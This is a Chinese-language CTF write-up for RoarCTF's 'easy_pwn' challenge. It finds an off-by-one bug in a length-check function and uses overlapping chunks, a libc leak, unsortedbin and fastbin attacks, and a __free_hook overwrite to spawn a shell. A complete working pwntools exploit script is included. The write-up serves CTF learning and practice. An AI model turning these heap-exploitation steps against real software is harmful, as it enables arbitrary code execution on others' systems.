Roarctf easy_pwn writeup

比赛当天满课，登上平台的时候发现只剩了16分，贼好奇是什么样的pwn能被打到16分，先膜一波大师傅们tql！orz

拿到题目首先检查。。保护全开

ssta@E4x:/media/psf/pwn/roarctf$ checksec easy_pwn
[*] '/media/psf/pwn/roarctf/easy_pwn'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

运行。。emm典型的菜单型堆题。。一开始还没找到漏洞！！！后来在write_note函数中找到了sub_E26这个处理输入长度的函数存在off by one

__int64 sub_E82()
{
  unsigned int v1; // [rsp+Ch] [rbp-14h]
  signed int v2; // [rsp+Ch] [rbp-14h]
  signed int v3; // [rsp+10h] [rbp-10h]
  unsigned int v4; // [rsp+14h] [rbp-Ch]

  printf("index: ");
  v2 = sub_BE0(v1);
  v3 = v2;
  if ( v2 >= 0 && v2 <= 15 )
  {
    v2 = *((_DWORD *)&unk_202040 + 4 * v2);
    if ( v2 == 1 )
    {
      printf("size: ");
      v2 = sub_BE0(1LL);
      v4 = sub_E26(*((_DWORD *)&unk_202044 + 4 * v3), v2);
      if ( v2 > 0 )
      {
        printf("content: ", (unsigned int)v2);
        v2 = sub_D92(qword_202048[2 * v3], v4);
      }
    }
  }
  return (unsigned int)v2;
}

__int64 __fastcall sub_E26(signed int a1, unsigned int a2)
{
  __int64 result; // rax

  if ( a1 > (signed int)a2 )
    return a2;
  if ( a2 - a1 == 10 )
    LODWORD(result) = a1 + 1;  // 长度比创建chunk时申请的大10返回会多一个字节！造成offbyone漏洞
  else
    LODWORD(result) = a1;
  return (unsigned int)result;
}

这题还有一点就：用calloc来申请堆块会将堆块内容置0，相当于malloc+memset函数，不过问题不大 233

利用思路：

1. 利用off by one构造chunk重叠
2. 用unsortedbin来leak出libc的地址
3. unsortedbin attack 将很大的值写到free_hook的下方，伪造fastbin（0x7f）
4. 利用1步构造的重叠堆块来进行fastbin attack 修改__free_hook 为system地址，同时在chunk内写入/bin/sh字符串
5. free掉最后calloc的chunk来起shell

Exp（参考kirin师傅的脚本来写的）:

#!/usr/bin/python
from pwn import *
# context.log_level='debug'


def create(size):
    p.sendlineafter('choice: ','1')
    p.sendlineafter('size: ',str(size))

def write(idx,size,content):
    p.sendlineafter('choice: ','2')
    p.sendlineafter('index: ',str(idx))
    p.sendlineafter('size: ',str(size))
    p.sendafter('content: ',content)

def drop(idx):
    p.sendlineafter('choice: ','3')
    p.sendlineafter('index: ',str(idx))

def show(idx):
    p.sendlineafter('choice: ','4')
    p.sendlineafter('index: ',str(idx))


p = process('./easy_pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
elf = ELF('./easy_pwn',checksec=False)

create(0xf8) # 0
create(0x68) # 1
create(0xf8) # 2
create(0x18) # 3
create(0x18) # 4

drop(0)
write(1,0x68+10,'\x00'*0x60+p64(0x170)+'\x20')
drop(2) 
#gdb.attach(p)
create(0xf8) # 0

show(1)
p.recvuntil('content: ')
libc_base = u64(p.recv(6).ljust(8,'\x00'))-(0x7ffff7dd1b78-0x7ffff7a0d000)
log.success("libc_base --> [%s]" % hex(libc_base))
free_hook = libc_base + libc.symbols['__free_hook']
log.success("free_hook --> [%s]" %hex(free_hook) )
system_addr = libc_base + libc.symbols['system']
log.success("system addr --> [%s]" % hex(system_addr) )

create(0x68) # 1
create(0xf8) # 2

write(3,16,'\x00'*8+p64(free_hook-0x40-0x10))
create(0x18)

# 1 2
drop(2)
write(1,8,p64(free_hook-0x40-0x10+13))

create(0x68)
create(0x68)

payload = "/bin/sh"+"\x00"*(0x33-7)+p64(system_addr)
write(7,len(payload),payload)
drop(7)

# gdb.attach(p)

p.interactive()

最后的利用方式与techworld ctf线上赛Pwn2一样，具体可以参考

https://www.jianshu.com/p/3a97c4c40ef3

据说还有unlink的解法，复现过后再过来补上